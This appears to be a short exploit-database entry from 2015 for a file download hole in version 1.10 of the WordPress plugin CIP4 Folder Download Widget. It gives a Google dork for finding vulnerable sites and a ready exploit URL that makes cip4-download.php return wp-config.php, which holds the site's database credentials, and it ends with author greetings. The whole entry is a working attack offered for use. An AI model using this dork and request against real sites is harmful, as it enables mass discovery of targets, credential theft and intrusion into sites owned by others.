# Exploit Title: CIP4 Folder Download Widget LFI # Google Dork: index of :/cip4-folder-download-widget # Date: 13-01-2015 # Exploit Author: Ben khlifa Fahmi (XTnR3v0lt) # Vendor Homepage: http://community.cip4.org # Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/ # Version: 1.10 # Tested on: Ubuntu 14.04 Dork : inurl:/wp-content/plugins/cip4-folder-download-widget/ Exploit : http://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php Ben khlifa Fahmi - Founder & CEO of Tunisian Cyber Army Greetz to : Joseph - Michou - hackerXben - RaisoMos - Lola - All muslim hackers world wide